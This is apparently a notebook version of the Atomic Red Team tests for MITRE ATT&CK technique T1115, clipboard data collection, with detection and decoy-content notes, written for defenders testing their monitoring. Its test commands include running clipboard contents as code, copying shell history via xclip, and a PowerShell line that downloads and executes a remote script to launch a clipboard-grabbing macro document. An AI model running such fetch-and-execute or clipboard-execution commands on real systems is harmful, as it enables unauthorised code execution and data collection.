# T1115 - Clipboard Data
Adversaries may collect data stored in the clipboard from users copying information within or between applications. 

In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)

## Atomic Tests

### Atomic Test #1 - Utilize Clipboard to store or execute commands from
Add data to clipboard to copy off or execute commands from.

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt
```

In [ ]:
Invoke-AtomicTest T1115 -TestNumbers 1

### Atomic Test #2 - Execute Commands from Clipboard using PowerShell
Utilize PowerShell to echo a command to clipboard and execute it

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
echo Get-Process | clip
Get-Clipboard | iex
```

In [ ]:
Invoke-AtomicTest T1115 -TestNumbers 2

### Atomic Test #3 - Execute commands from clipboard
Echo a command to clipboard and execute it
**Supported Platforms:** macos
#### Attack Commands: Run with `bash`
```bash
echo ifconfig | pbcopy
$(pbpaste)```

In [ ]:
Invoke-AtomicTest T1115 -TestNumbers 3

### Atomic Test #4 - Collect Clipboard Data via VBA
This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: Microsoft #{ms_product} must be installed

##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }

```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"

```

In [ ]:
Invoke-AtomicTest T1115 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
```

In [ ]:
Invoke-AtomicTest T1115 -TestNumbers 4

### Atomic Test #5 - Add or copy content to clipboard with xClip
Utilize Linux Xclip to copy history and place in clipboard then output to a history.txt file. Successful execution will capture history and output to a file on disk.

**Supported Platforms:** linux
#### Attack Commands: Run with `sh`
```sh
apt install xclip -y
history | tail -n 30 | xclip -sel clip
xclip -o > history.txt
```

In [ ]:
Invoke-AtomicTest T1115 -TestNumbers 5

## Detection
Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.

## Shield Active Defense
### Decoy Content  
 Seed content that can be used to lead an adversary in a specific direction, entice a behavior, etc. 

 Decoy Content is the data used to tell a story to an adversary. This content can be legitimate or synthetic data which is used to reinforce or validate your defensive strategy. Examples of decoy content are files on a storage object, entries in the system registry, system shortcuts, etc.
#### Opportunity
There is an opportunity to introduce data to an adversary to influence their future behaviors.
#### Use Case
A defender can insert into a system's clipboard decoy content for the adversary to find. 
#### Procedures
Create directories and files with names and contents using key words that may be relevant to an adversary to see if they examine or exfiltrate the data.
Seed a file system with content that is of no value to the company but reinforces the legitimacy of the system if viewed by an adversary.